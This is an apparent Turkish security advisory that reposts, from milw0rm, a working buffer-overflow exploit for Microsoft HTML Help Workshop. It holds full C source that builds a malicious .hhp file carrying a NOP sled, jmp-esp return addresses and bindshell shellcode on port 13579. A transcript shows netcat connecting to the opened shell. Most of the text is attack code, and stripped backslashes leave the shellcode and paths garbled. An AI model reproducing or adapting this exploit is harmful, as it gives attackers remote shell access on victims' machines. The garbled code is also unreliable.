Risk : Normal
Etki : Uzaktan kod çalıştırma, Eksiklik
Etkilenen : Microsoft HTML Çalışma Grubu , .hpp dosyası
Bilgi : Microsoft'un html dili ile calişan yazılımlarinin .hpp dosyasinda bulunan güvenlik açığı. Henüz çok yeni olan Güvenlik açığının yaması yoktur.
Exploit:
C:htmlws>poc2
Microsoft HTML Help Workshop Buffer Overflow.
Coded by bratax (().
Usage: C:htmlwsPoC2.exe <outputfile>
C:htmlws>poc2 new.hhp
File written.
Open with Microsoft Help Workshop to exploit.
C:htmlws>nc -vv localhost 13579
DNS fwd/rev mismatch: RENEE != localhost
RENEE [127.0.0.1] 13579 (?) open
Microsoft Windows XP [versie 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:htmlws>exit
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char pre[]=
"[OPTIONS] "
"Compatibility=1.1 or later "
"Compiled file=bratax.chm "
"Contents file=";
char end[]=
"Display compile progress=No "
"Language=0x813 Dutch (Belgium) "
"[INFOTYPES]";
char shellcode[]=
/* bindshell port 13579 thx to metasploit.com :) */
"x29xc9x83xe9xafxd9xeexd9x74x24xf4x5bx81x73x13x8f"
"x35x37x85x83xebxfcxe2xf4x73x5fxdcxcax67xccxc8x7a"
"x70x55xbcxe9xabx11xbcxc0xb3xbex4bx80xf7x34xd8x0e"
"xc0x2dxbcxdaxafx34xdcx66xbfx7cxbcxb1x04x34xd9xb4"
"x4fxacx9bx01x4fx41x30x44x45x38x36x47x64xc1x0cxd1"
"xabx1dx42x66x04x6ax13x84x64x53xbcx89xc4xbex68x99"
"x8exdex34xa9x04xbcx5bxa1x93x54xf4xb4x4fx51xbcxc5"
"xbfxbex77x89x04x45x2bx28x04x75x3fxdbxe7xbbx79x8b"
"x63x65xc8x53xbexeex51xd6xe9x5dx04xb7xe7x42x44xb7"
"xd0x61xc8x55xe7xfexdax79xb4x65xc8x53xd0xbcxd2xe3"
"x0exd8x3fx87xdax5fx35x7ax5fx5dxeex8cx7ax98x60x7a"
"x59x66x64xd6xdcx66x74xd6xccx66xc8x55xe9x5dx02x8e"
"xe9x66xbex64x1ax5dx93x9fxffxf2x60x7ax59x5fx27xd4"
"xdaxcaxe7xedx2bx98x19x6cxd8xcaxe1xd6xdaxcaxe7xed"
"x6ax7cxb1xccxd8xcaxe1xd5xdbx61x62x7ax5fxa6x5fx62"
"xf6xf3x4exd2x70xe3x62x7ax5fx53x5dxe1xe9x5dx54xe8"
"x06xd0x5dxd5xd6x1cxfbx0cx68x5fx73x0cx6dx04xf7x76"
"x25xcbx75xa8x71x77x1bx16x02x4fx0fx2ex24x9ex5fxf7"
"x71x86x21x7axfax71xc8x53xd4x62x65xd4xdex64x5dx84"
"xdex64x62xd4x70xe5x5fx28x56x30xf9xd6x70xe3x5dx7a"
"x70x02xc8x55x04x62xcbx06x4bx51xc8x53xddxcaxe7xed"
"xf1xedxd5xf6xdcxcaxe1x7ax5fx35x37x85";
char overflow[15000]; // 15k just to make sure :)
int main(int argc,char *argv[])
{
FILE *vuln;
if(argc == 1)
{
printf("Microsoft HTML Help Workshop Buffer Overflow. ");
printf("Coded by bratax ((). ");
printf("Usage: %s <outputfile> ",argv[0]);
return 0;
}
vuln = fopen(argv[1],"w");
//build overflow buffer here.
memset(overflow,0x90,sizeof(overflow)); //fill with nops
memcpy(overflow+272,"x5dx38x82x7c",4); //EIP (jmp esp) 1 of these is
memcpy(overflow+276,"x5dx38x82x7c",4); //EIP (jmp esp) enough but was
memcpy(overflow+280,"x5dx38x82x7c",4); //EIP (jmp esp) a bit lazy to
memcpy(overflow+284,"x5dx38x82x7c",4); //EIP (jmp esp) find out the
memcpy(overflow+288,"x5dx38x82x7c",4); //EIP (jmp esp) correct one :p
memcpy(overflow+292,"x5dx38x82x7c",4); //EIP (jmp esp)
memcpy(overflow+300,shellcode,sizeof(shellcode)); //our shellcode after some nops to land in
if(vuln)
{
//Write file
fprintf(vuln,"%s%s"/> %s",pre,overflow,end);
fclose(vuln);
}
printf("File written. Open with Microsoft Help Workshop to exploit. ");
return 0;
}
Kaynak: MilW0rM.
Security Advisory by Onur OKTAY